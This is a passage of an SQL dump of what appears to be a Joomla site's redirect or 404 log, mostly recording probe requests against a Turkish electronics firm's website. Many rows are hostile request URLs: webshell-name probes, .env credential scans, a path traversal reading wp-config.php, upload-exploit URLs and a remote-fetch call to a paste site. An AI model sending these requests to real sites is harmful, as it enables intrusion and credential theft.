00:00:00',301),(27051,'http://3s-technologies.com.tr/tr/components/com_content/helpers/images.php',NULL,'http://3s-technologies.com.tr/components/com_content/helpers/images.php','',1,0,'2021-03-23 00:47:58','0000-00-00 00:00:00',301),(27052,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/helpers/html/dm2.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_admin/helpers/html/dm2.php','',1,0,'2021-03-23 01:39:29','0000-00-00 00:00:00',301),(27053,'http://3s-technologies.com.tr/tr/assets/images/wp-post.php',NULL,'http://3s-technologies.com.tr/assets/images/wp-post.php','',1,0,'2021-03-23 06:00:29','0000-00-00 00:00:00',301),(27054,'http://3s-technologies.com.tr/tr/cgi-bin/cgi-bin.php',NULL,'http://3s-technologies.com.tr/cgi-bin/cgi-bin.php','',1,0,'2021-03-23 07:00:54','0000-00-00 00:00:00',301),(27055,'http://3s-technologies.com.tr/tr/bin/.../wp-log.php.suspected',NULL,'http://3s-technologies.com.tr/bin/.../wp-log.php.suspected','',1,0,'2021-03-23 08:42:20','0000-00-00 00:00:00',301),(27056,'http://3s-technologies.com.tr/tr/281f.php',NULL,'http://3s-technologies.com.tr/281f.php','',2,0,'2021-03-23 08:49:48','0000-00-00 00:00:00',301),(27057,'http://3s-technologies.com.tr/tr/templates/beez3/simple.php5',NULL,'http://3s-technologies.com.tr/templates/beez3/simple.php5','',1,0,'2021-03-23 09:30:46','0000-00-00 00:00:00',301),(27058,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/controllers/simple.php5',NULL,'http://3s-technologies.com.tr/administrator/components/com_admin/controllers/simple.php5','',1,0,'2021-03-23 10:04:26','0000-00-00 00:00:00',301),(27059,'http://3s-technologies.com.tr/tr/lite.php',NULL,'http://3s-technologies.com.tr/lite.php','',30,0,'2021-03-23 10:24:09','0000-00-00 00:00:00',301),(27060,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2021-03-23 10:24:15','0000-00-00 00:00:00',301),(27061,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,category_name',NULL,'','',586,0,'2021-03-23 10:24:18','0000-00-00 00:00:00',301),(27062,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',590,0,'2021-03-23 10:24:22','0000-00-00 00:00:00',301),(27063,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,mf_name',NULL,'','',568,0,'2021-03-23 10:24:32','0000-00-00 00:00:00',301),(27064,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,category_name/dirdesc',NULL,'','',634,0,'2021-03-23 10:24:52','0000-00-00 00:00:00',301),(27065,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',613,0,'2021-03-23 10:25:38','0000-00-00 00:00:00',301),(27066,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,product_sku',NULL,'','',611,0,'2021-03-23 10:25:48','0000-00-00 00:00:00',301),(27067,'http://3s-technologies.com.tr/tr/olariaemcuritiba.com.br/docindex.php',NULL,'http://3s-technologies.com.tr/olariaemcuritiba.com.br/docindex.php','',1,0,'2021-03-23 10:41:52','0000-00-00 00:00:00',301),(27068,'http://3s-technologies.com.tr/tr/components/com_contact/controllers/green.php.suspected',NULL,'http://3s-technologies.com.tr/components/com_contact/controllers/green.php.suspected','',2,0,'2021-03-23 10:57:08','0000-00-00 00:00:00',301),(27069,'http://3s-technologies.com.tr/tr/components/wp-info.php',NULL,'http://3s-technologies.com.tr/components/wp-info.php','',1,0,'2021-03-23 11:12:45','0000-00-00 00:00:00',301),(27070,'http://3s-technologies.com.tr/tr/plugins/sitemps.php',NULL,'http://3s-technologies.com.tr/plugins/sitemps.php','',1,0,'2021-03-23 11:15:27','0000-00-00 00:00:00',301),(27071,'http://3s-technologies.com.tr/tr/back/templates/protostar/doc.php',NULL,'http://3s-technologies.com.tr/back/templates/protostar/doc.php','',1,0,'2021-03-23 11:32:37','0000-00-00 00:00:00',301),(27072,'http://3s-technologies.com.tr/tr/logs/sitemps.php',NULL,'http://3s-technologies.com.tr/logs/sitemps.php','',1,0,'2021-03-23 11:33:01','0000-00-00 00:00:00',301),(27073,'http://3s-technologies.com.tr/tr/nsgin.com/cache/wp-plugins.php',NULL,'http://3s-technologies.com.tr/nsgin.com/cache/wp-plugins.php','',2,0,'2021-03-23 11:38:25','0000-00-00 00:00:00',301),(27074,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/blackhat.php',NULL,'http://3s-technologies.com.tr/modules/mod_fxprev/libraries/blackhat.php','',1,0,'2021-03-23 11:40:28','0000-00-00 00:00:00',301),(27075,'http://3s-technologies.com.tr/tr/parency/popup-pomo.php',NULL,'http://3s-technologies.com.tr/parency/popup-pomo.php','',1,0,'2021-03-23 11:47:17','0000-00-00 00:00:00',301),(27076,'http://3s-technologies.com.tr/tr/wp-config-sample.php',NULL,'http://3s-technologies.com.tr/wp-config-sample.php','',111,0,'2021-03-23 12:30:09','0000-00-00 00:00:00',301),(27077,'http://3s-technologies.com.tr/tr/wp-xml1.php',NULL,'http://3s-technologies.com.tr/wp-xml1.php','',2,0,'2021-03-23 12:30:34','0000-00-00 00:00:00',301),(27078,'http://3s-technologies.com.tr/tr/abreast/popup-pomo.php',NULL,'http://3s-technologies.com.tr/abreast/popup-pomo.php','',2,0,'2021-03-23 13:54:56','0000-00-00 00:00:00',301),(27079,'http://3s-technologies.com.tr/tr/managera/popup-pomo.php',NULL,'http://3s-technologies.com.tr/managera/popup-pomo.php','',1,0,'2021-03-23 15:12:25','0000-00-00 00:00:00',301),(27080,'http://3s-technologies.com.tr/tr/.well-known/wp-info.php',NULL,'http://3s-technologies.com.tr/.well-known/wp-info.php','',1,0,'2021-03-23 17:45:47','0000-00-00 00:00:00',301),(27081,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/assets/css/img/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_imageshow/assets/css/img/htaccess.php','',1,0,'2021-03-23 18:16:42','0000-00-00 00:00:00',301),(27082,'http://3s-technologies.com.tr/tr/administrator/components/com_admintools/views/adminuser/tmpl/0byte.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_admintools/views/adminuser/tmpl/0byte.php','',1,0,'2021-03-23 18:20:26','0000-00-00 00:00:00',301),(27083,'http://3s-technologies.com.tr/tr/test/maint/popup-pomo.php',NULL,'http://3s-technologies.com.tr/test/maint/popup-pomo.php','',1,0,'2021-03-23 18:38:22','0000-00-00 00:00:00',301),(27084,'http://3s-technologies.com.tr/tr/files/wp-info.php',NULL,'http://3s-technologies.com.tr/files/wp-info.php','',2,0,'2021-03-23 18:48:23','0000-00-00 00:00:00',301),(27085,'http://3s-technologies.com.tr/tr/administrator/cache/gank.php.php',NULL,'http://3s-technologies.com.tr/administrator/cache/gank.php.PhP','',1,0,'2021-03-23 18:53:42','0000-00-00 00:00:00',301),(27086,'http://3s-technologies.com.tr/tr/aw.php',NULL,'http://3s-technologies.com.tr/aw.php','',50,0,'2021-03-23 18:53:44','0000-00-00 00:00:00',301),(27087,'http://3s-technologies.com.tr/tr/templates/beez/javascript/tools.php',NULL,'http://3s-technologies.com.tr/templates/beez/javascript/tools.php','',1,0,'2021-03-23 19:24:05','0000-00-00 00:00:00',301),(27088,'http://3s-technologies.com.tr/tr/libraries/cms/form/data.php',NULL,'http://3s-technologies.com.tr/libraries/cms/form/data.php','',1,0,'2021-03-23 19:44:03','0000-00-00 00:00:00',301),(27089,'http://3s-technologies.com.tr/tr/administrator/components/com_joomgallery/views/category/fdgs.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_joomgallery/views/category/fdgs.php','',1,0,'2021-03-23 19:57:31','0000-00-00 00:00:00',301),(27090,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagallerycoimg/tmpl/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_phocagallery/views/phocagallerycoimg/tmpl/htaccess.php','',1,0,'2021-03-23 20:03:45','0000-00-00 00:00:00',301),(27091,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_weblinks/weblinks/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/templates/hathor/html/com_weblinks/weblinks/htaccess.php','',1,0,'2021-03-23 20:31:05','0000-00-00 00:00:00',301),(27092,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail',NULL,'','',7,0,'2021-03-23 21:10:52','0000-00-00 00:00:00',301),(27093,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/ostora.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/ostora.php','',1,0,'2021-03-23 21:28:27','0000-00-00 00:00:00',301),(27094,'http://3s-technologies.com.tr/tr/w2.php',NULL,'http://3s-technologies.com.tr/w2.php','',3,0,'2021-03-23 21:43:49','0000-00-00 00:00:00',301),(27095,'http://3s-technologies.com.tr/tr/widgets/content-post.php',NULL,'http://3s-technologies.com.tr/widgets/content-post.php','',1,0,'2021-03-23 22:29:36','0000-00-00 00:00:00',301),(27096,'http://3s-technologies.com.tr/tr/cry.php',NULL,'http://3s-technologies.com.tr/cry.php','',2,0,'2021-03-23 22:47:45','0000-00-00 00:00:00',301),(27097,'http://3s-technologies.com.tr/tr/templates/atomic/l.php',NULL,'http://3s-technologies.com.tr/templates/atomic/l.php','',1,0,'2021-03-23 23:03:00','0000-00-00 00:00:00',301),(27098,'http://3s-technologies.com.tr/tr/cgi-bin/media-admin.php',NULL,'http://3s-technologies.com.tr/cgi-bin/media-admin.php','',1,0,'2021-03-24 01:33:55','0000-00-00 00:00:00',301),(27099,'http://3s-technologies.com.tr/tr/doc.php/404.php',NULL,'http://3s-technologies.com.tr/doc.php/404.php','',4,0,'2021-03-24 01:46:31','0000-00-00 00:00:00',301),(27100,'http://3s-technologies.com.tr/tr/tmp/user.php',NULL,'http://3s-technologies.com.tr/tmp/user.php','',1,0,'2021-03-24 01:48:37','0000-00-00 00:00:00',301),(27101,'http://3s-technologies.com.tr/tr/qwerty.php',NULL,'http://3s-technologies.com.tr/qwerty.php','',1,0,'2021-03-24 02:03:33','0000-00-00 00:00:00',301),(27102,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/btk.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/btk.php','',1,0,'2021-03-24 02:40:54','0000-00-00 00:00:00',301),(27103,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/isyruphjtn.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/isyruphjtn.php','',1,0,'2021-03-24 02:59:17','0000-00-00 00:00:00',301),(27104,'http://3s-technologies.com.tr/tr/modules/mod_footer/tmpl/popup-pomo.php',NULL,'http://3s-technologies.com.tr/modules/mod_footer/tmpl/popup-pomo.php','',1,0,'2021-03-24 03:33:38','0000-00-00 00:00:00',301),(27105,'http://3s-technologies.com.tr/tr/libraries/joomla/client/ob.php',NULL,'http://3s-technologies.com.tr/libraries/joomla/client/ob.php','',1,0,'2021-03-24 03:47:11','0000-00-00 00:00:00',301),(27106,'http://3s-technologies.com.tr/tr/emigrate/popup-pomo.php',NULL,'http://3s-technologies.com.tr/emigrate/popup-pomo.php','',1,0,'2021-03-24 03:58:38','0000-00-00 00:00:00',301),(27107,'http://3s-technologies.com.tr/tr/images/theme.php',NULL,'http://3s-technologies.com.tr/images/theme.php','',1,0,'2021-03-24 05:10:14','0000-00-00 00:00:00',301),(27108,'http://3s-technologies.com.tr/tr/components/com_search/models/doc.php',NULL,'http://3s-technologies.com.tr/components/com_search/models/doc.php','',1,0,'2021-03-24 05:22:51','0000-00-00 00:00:00',301),(27109,'http://3s-technologies.com.tr/tr/libraries/cms/captcha/data.php',NULL,'http://3s-technologies.com.tr/libraries/cms/captcha/data.php','',1,0,'2021-03-24 05:42:53','0000-00-00 00:00:00',301),(27110,'http://3s-technologies.com.tr/tr/images/content-post.php',NULL,'http://3s-technologies.com.tr/images/content-post.php','',1,0,'2021-03-24 06:30:32','0000-00-00 00:00:00',301),(27111,'http://3s-technologies.com.tr/tr/home/wp-info.php',NULL,'http://3s-technologies.com.tr/home/wp-info.php','',2,0,'2021-03-24 07:54:03','0000-00-00 00:00:00',301),(27112,'http://3s-technologies.com.tr/tr/templates/beez3/list.php',NULL,'http://3s-technologies.com.tr/templates/beez3/list.php','',1,0,'2021-03-24 09:10:29','0000-00-00 00:00:00',301),(27113,'http://3s-technologies.com.tr/tr/surly/popup-pomo.php',NULL,'http://3s-technologies.com.tr/surly/popup-pomo.php','',1,0,'2021-03-24 11:25:55','0000-00-00 00:00:00',301),(27114,'http://3s-technologies.com.tr/en/xmlrp.php?url=https://textbin.net/raw/feemcpvmob',NULL,'www.google.com','',2,0,'2021-03-24 17:31:09','0000-00-00 00:00:00',301),(27115,'https://3s-technologies.com.tr/en/xmlrp.php?url=https://textbin.net/raw/feemcpvmob',NULL,'www.google.com','',2,0,'2021-03-24 17:31:16','0000-00-00 00:00:00',301),(27116,'http://3s-technologies.com.tr/en/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',14,0,'2021-03-25 12:28:35','0000-00-00 00:00:00',301),(27117,'http://3s-technologies.com.tr/en/api/.env',NULL,'','',16,0,'2021-03-25 12:28:55','0000-00-00 00:00:00',301),(27118,'http://3s-technologies.com.tr/en/laravel/.env',NULL,'','',16,0,'2021-03-25 12:29:03','0000-00-00 00:00:00',301),(27119,'http://3s-technologies.com.tr/en/test/.env',NULL,'','',7,0,'2021-03-25 12:29:11','0000-00-00 00:00:00',301),(27120,'http://3s-technologies.com.tr/en/admin/.env',NULL,'','',16,0,'2021-03-25 12:29:21','0000-00-00 00:00:00',301),(27121,'http://3s-technologies.com.tr/en/vendor/.env',NULL,'','',13,0,'2021-03-25 12:29:31','0000-00-00 00:00:00',301),(27122,'http://3s-technologies.com.tr/en/sites/.env',NULL,'','',6,0,'2021-03-25 12:29:40','0000-00-00 00:00:00',301),(27123,'http://3s-technologies.com.tr/en/blog/.env',NULL,'','',7,0,'2021-03-25 12:29:50','0000-00-00 00:00:00',301),(27124,'http://3s-technologies.com.tr/en/system/.env',NULL,'','',6,0,'2021-03-25 12:29:59','0000-00-00 00:00:00',301),(27125,'http://3s-technologies.com.tr/en/public/.env',NULL,'','',14,0,'2021-03-25 12:30:08','0000-00-00 00:00:00',301),(27126,'http://3s-technologies.com.tr/en/shop/.env',NULL,'','',6,0,'2021-03-25 12:30:18','0000-00-00 00:00:00',301),(27127,'https://3s-technologies.com.tr/tr/component/k2/item/10',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/10','',5,0,'2021-03-25 14:28:11','0000-00-00 00:00:00',301),(27128,'https://3s-technologies.com.tr/tr/component/k2/item/8',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/8','',7,0,'2021-03-25 15:51:13','0000-00-00 00:00:00',301),(27129,'https://3s-technologies.com.tr/tr/component/k2/item/13',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/13','',4,0,'2021-03-25 16:30:41','0000-00-00 00:00:00',301),(27130,'http://www.3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',3,0,'2021-03-25 16:45:13','0000-00-00 00:00:00',301),(27131,'http://www.3s-technologies.com.tr/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',3,0,'2021-03-25 16:45:14','0000-00-00 00:00:00',301),(27132,'http://www.3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/tmp-upload-images/vuln.php',NULL,'','',3,0,'2021-03-25 16:45:15','0000-00-00 00:00:00',301),(27133,'http://www.3s-technologies.com.tr/tr/tmp/vuln.php.xxxjpg',NULL,'','',3,0,'2021-03-25 16:45:15','0000-00-00 00:00:00',301),(27134,'https://3s-technologies.com.tr/tr/component/k2/item/12',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/12','',5,0,'2021-03-25 16:53:12','0000-00-00 00:00:00',301),(27135,'https://3s-technologies.com.tr/tr/component/k2/item/15',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/15','',3,0,'2021-03-25 18:28:37','0000-00-00 00:00:00',301),(27136,'https://3s-technologies.com.tr/tr/component/k2/item/14',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/14','',2,0,'2021-03-25 20:16:36','0000-00-00 00:00:00',301),(27137,'https://3s-technologies.com.tr/tr/component/k2/item/3',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/3','',1,0,'2021-03-25 21:36:57','0000-00-00 00:00:00',301),(27138,'https://3s-technologies.com.tr/tr/component/k2/item/4',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/4','',4,0,'2021-03-25 22:00:20','0000-00-00 00:00:00',301),(27139,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',598,0,'2021-03-26 00:30:52','0000-00-00 00:00:00',301),(27140,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',576,0,'2021-03-26 00:31:04','0000-00-00 00:00:00',301),(27141,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,ordering',NULL,'','',578,0,'2021-03-26 00:31:17','0000-00-00 00:00:00',301),(27142,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,product_name',NULL,'','',591,0,'2021-03-26 00:31:25','0000-00-00 00:00:00',301),(27143,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',602,0,'2021-03-26 00:31:29','0000-00-00 00:00:00',301),(27144,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/by,product_sku',NULL,'','',609,0,'2021-03-26 00:31:50','0000-00-00 00:00:00',301),(27145,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/dirdesc',NULL,'','',615,0,'2021-03-26 00:32:06','0000-00-00 00:00:00',301),(27146,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/mx200lp-de',NULL,'','',142,0,'2021-03-26 00:32:22','0000-00-00 00:00:00',301),(27147,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/mx200lp-detail',NULL,'','',308,0,'2021-03-26 00:32:30','0000-00-00 00:00:00',301),(27148,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hä±zlä±/mx200lp-detail/askquestion?tmpl=component',NULL,'','',307,0,'2021-03-26 00:32:40','0000-00-00 00:00:00',301),(27149,'https://3s-technologies.com.tr/tr/component/k2/item/7',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/7','',4,0,'2021-03-26 02:06:55','0000-00-00 00:00:00',301),(27150,'https://3s-technologies.com.tr/tr/component/k2/item/2',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/2','',2,0,'2021-03-26 02:41:00','0000-00-00 00:00:00',301),(27151,'https://3s-technologies.com.tr/tr/component/k2/item/1',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/1','',4,0,'2021-03-26 03:04:25','0000-00-00 00:00:00',301),(27152,'https://3s-technologies.com.tr/tr/component/k2/item/5',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/5','',4,0,'2021-03-26 05:48:09','0000-00-00 00:00:00',301),(27153,'http://3s-technologies.com.tr/tr/includes/sitemps.php',NULL,'http://3s-technologies.com.tr/includes/sitemps.php','',1,0,'2021-03-26 08:15:41','0000-00-00 00:00:00',301),(27154,'http://3s-technologies.com.tr/tr/administrator/components/com_cache/helpers/images.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_cache/helpers/images.php','',2,0,'2021-03-26 08:17:37','0000-00-00 00:00:00',301),(27155,'http://3s-technologies.com.tr/tr/wp-blog.php.suspected',NULL,'http://3s-technologies.com.tr/wp-blog.php.suspected','',2,0,'2021-03-26 09:06:19','0000-00-00 00:00:00',301),(27156,'http://3s-technologies.com.tr/tr/images/get.php',NULL,'http://3s-technologies.com.tr/images/get.php','',1,0,'2021-03-26 09:07:22','0000-00-00 00:00:00',301),(27157,'https://3s-technologies.com.tr/tr/component/k2/item/11',NULL,'https://3s-technologies.com.tr/index.php/component/k2/item/11','',3,0,'2021-03-26 09:11:36','0000-00-00 00:00:00',301),(27158,'http://3s-technologies.com.tr/tr/bk30012020/viruscode--/components/com_foxcontact/c_2018.php',NULL,'http://3s-technologies.com.tr/bk30012020/viruscode--/components/com_foxcontact/c_2018.php','',1,0,'2021-03-26 09:39:46','0000-00-00 00:00:00',301),(27159,'http://3s-technologies.com.tr/tr/greens.php.suspected',NULL,'http://3s-technologies.com.tr/GreenS.php.suspected','',2,0,'2021-03-26 10:45:00','0000-00-00 00:00:00',301),(27160,'http://3s-technologies.com.tr/tr/.well-known/wp-catcha.php',NULL,'http://3s-technologies.com.tr/.well-known/wp-catcha.php','',1,0,'2021-03-26 10:47:22','0000-00-00 00:00:00',301),(27161,'http://3s-technologies.com.tr/tr/components/sitemps.php',NULL,'http://3s-technologies.com.tr/components/sitemps.php','',1,0,'2021-03-26 11:02:39','0000-00-00 00:00:00',301),(27162,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/0x.php',NULL,'http://3s-technologies.com.tr/modules/mod_simplefileuploadv1.3/elements/0x.php','',1,0,'2021-03-26 11:03:38','0000-00-00 00:00:00',301),(27163,'http://3s-technologies.com.tr/tr/administrator/components/com_content/helpers/html/5e43c79823350.php.suspected',NULL,'http://3s-technologies.com.tr/administrator/components/com_content/helpers/html/5e43c79823350.php.suspected','',1,0,'2021-03-26 11:03:55','0000-00-00 00:00:00',301),(27164,'http://3s-technologies.com.tr/tr/image.php.suspected',NULL,'http://3s-technologies.com.tr/image.php.suspected','',4,0,'2021-03-26 11:17:18','0000-00-00 00:00:00',301),(27165,'http://3s-technologies.com.tr/tr/administrator/components/com_redirect/models/fields/.h..php',NULL,'http://3s-technologies.com.tr/administrator/components/com_redirect/models/fields/.h..php','',1,0,'2021-03-26 11:51:15','0000-00-00 00:00:00',301),(27166,'http://3s-technologies.com.tr/tr/components/com_jooomlas/xyxz.php',NULL,'http://3s-technologies.com.tr/components/com_jooomlas/xyxz.php','',1,0,'2021-03-26 12:27:09','0000-00-00 00:00:00',301),(27167,'http://3s-technologies.com.tr/tr/cache/widgetkit/data.php',NULL,'http://3s-technologies.com.tr/cache/widgetkit/data.php','',1,0,'2021-03-26 12:39:41','0000-00-00 00:00:00',301),(27168,'http://3s-technologies.com.tr/tr/newsletter.kinasportswear.com/wp-catcha.php',NULL,'http://3s-technologies.com.tr/newsletter.kinasportswear.com/wp-catcha.php','',1,0,'2021-03-26 13:29:25','0000-00-00 00:00:00',301),(27169,'http://3s-technologies.com.tr/tr/modules/mod_verison/nrkindex.php',NULL,'http://3s-technologies.com.tr/modules/mod_verison/nrkindex.php','',2,0,'2021-03-26 13:31:52','0000-00-00 00:00:00',301),(27170,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/controllers/images.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_banners/controllers/images.php','',1,0,'2021-03-26 13:57:35','0000-00-00 00:00:00',301),(27171,'http://3s-technologies.com.tr/tr/velocitydealerz/license.php',NULL,'http://3s-technologies.com.tr/velocitydealerz/license.php','',2,0,'2021-03-26 14:33:45','0000-00-00 00:00:00',301),(27172,'http://3s-technologies.com.tr/tr//adm.php',NULL,'','',2,0,'2021-03-26 15:26:12','0000-00-00 00:00:00',301),(27173,'http://3s-technologies.com.tr/tr//sql.php',NULL,'','',2,0,'2021-03-26 15:26:12','0000-00-00 00:00:00',301),(27174,'http://3s-technologies.com.tr/tr/get.php',NULL,'http://3s-technologies.com.tr/get.php','',17,0,'2021-03-26 15:30:29','0000-00-00 00:00:00',301),(27175,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/libraries/phocagallery/library/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_phocagallery/libraries/phocagallery/library/htaccess.php','',7,0,'2021-03-26 16:19:20','0000-00-00 00:00:00',301),(27176,'http://3s-technologies.com.tr/tr/dcxw5w.php',NULL,'http://3s-technologies.com.tr/dcxw5w.php','',2,0,'2021-03-26 16:32:30','0000-00-00 00:00:00',301),(27177,'http://3s-technologies.com.tr/tr/libraries/sitemps.php',NULL,'http://3s-technologies.com.tr/libraries/sitemps.php','',1,0,'2021-03-26 17:21:59','0000-00-00 00:00:00',301),(27178,'http://3s-technologies.com.tr/tr/administrator/components/com_categories/views/categories/tmpl/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_categories/views/categories/tmpl/htaccess.php','',2,0,'2021-03-26 18:46:34','0000-00-00 00:00:00',301),(27179,'http://3s-technologies.com.tr/tr/submitticket.php',NULL,'http://3s-technologies.com.tr/submitticket.php','',3,0,'2021-03-26 18:46:51','0000-00-00 00:00:00',301),(27180,'http://3s-technologies.com.tr/tr/wp-uploads.php',NULL,'http://3s-technologies.com.tr/wp-uploads.php','',36,0,'2021-03-26 19:02:19','0000-00-00 00:00:00',301),(27181,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagalleryco/tmpl/htaccess.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_phocagallery/views/phocagalleryco/tmpl/htaccess.php','',2,0,'2021-03-26 19:29:15','0000-00-00 00:00:00',301),(27182,'http://3s-technologies.com.tr/tr/language/en-gb/en-gb.php.suspected',NULL,'http://3s-technologies.com.tr/language/en-GB/en-GB.php.suspected','',1,0,'2021-03-26 19:55:59','0000-00-00 00:00:00',301),(27183,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/demo.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/demo.php','',1,0,'2021-03-26 20:12:51','0000-00-00 00:00:00',301),(27184,'http://3s-technologies.com.tr/tr/plugins/system/jsnframework/libraries/joomlashine/update/htaccess.php',NULL,'http://3s-technologies.com.tr/plugins/system/jsnframework/libraries/joomlashine/update/htaccess.php','',2,0,'2021-03-26 20:57:28','0000-00-00 00:00:00',301),(27185,'http://3s-technologies.com.tr/tr/libraries/joomla/template/ash.php.suspected',NULL,'http://3s-technologies.com.tr/libraries/joomla/template/ash.php.suspected','',1,0,'2021-03-26 21:29:54','0000-00-00 00:00:00',301),(27186,'http://3s-technologies.com.tr/tr/language/sitemps.php',NULL,'http://3s-technologies.com.tr/language/sitemps.php','',1,0,'2021-03-26 21:47:21','0000-00-00 00:00:00',301),(27187,'http://3s-technologies.com.tr/tr/ollx.php',NULL,'http://3s-technologies.com.tr/ollx.php','',2,0,'2021-03-27 05:51:10','0000-00-00 00:00:00',301),(27188,'http://3s-technologies.com.tr/tr/cache/sitemps.php',NULL,'http://3s-technologies.com.tr/cache/sitemps.php','',2,0,'2021-03-27 07:45:57','0000-00-00 00:00:00',301),(27189,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',12,0,'2021-03-27 08:15:00','0000-00-00 00:00:00',301),(27190,'http://3s-technologies.com.tr/tr/wp-admin/media.php',NULL,'http://3s-technologies.com.tr/wp-admin/media.php','',23,0,'2021-03-27 09:11:53','0000-00-00 00:00:00',301),(27191,'http://3s-technologies.com.tr/tr/wp-admin/js/editor.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/editor.php','',1,0,'2021-03-27 09:12:18','0000-00-00 00:00:00',301),(27192,'http://3s-technologies.com.tr/tr/wp-admin/link-add.php',NULL,'http://3s-technologies.com.tr/wp-admin/link-add.php','',1,0,'2021-03-27 09:28:47','0000-00-00 00:00:00',301),(27193,'http://3s-technologies.com.tr/tr/wp-admin/network/themes.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/themes.php','',2,0,'2021-03-27 09:29:00','0000-00-00 00:00:00',301),(27194,'http://3s-technologies.com.tr/tr/wp-content/uploads/zupxxw.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/zupxxw.php','',1,0,'2021-03-27 09:34:34','0000-00-00 00:00:00',301),(27195,'http://3s-technologies.com.tr/tr/wp-admin/network/sites.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/sites.php','',2,0,'2021-03-27 09:45:43','0000-00-00 00:00:00',301),(27196,'http://3s-technologies.com.tr/tr/wp-admin/themes.php',NULL,'http://3s-technologies.com.tr/wp-admin/themes.php','',25,0,'2021-03-27 09:49:38','0000-00-00 00:00:00',301),(27197,'http://3s-technologies.com.tr/tr/wp-admin/options-writing.php',NULL,'http://3s-technologies.com.tr/wp-admin/options-writing.php','',1,0,'2021-03-27 10:02:45','0000-00-00 00:00:00',301),(27198,'http://3s-technologies.com.tr/tr/wp-admin/network/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/admin.php','',72,0,'2021-03-27 10:06:17','0000-00-00 00:00:00',301),(27199,'http://3s-technologies.com.tr/tr/wp-admin/upload.php',NULL,'http://3s-technologies.com.tr/wp-admin/upload.php','',7,0,'2021-03-27 10:18:48','0000-00-00 00:00:00',301),(27200,'http://3s-technologies.com.tr/tr/wp-admin/user/freedoms.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/freedoms.php','',1,0,'2021-03-27 10:22:23','0000-00-00 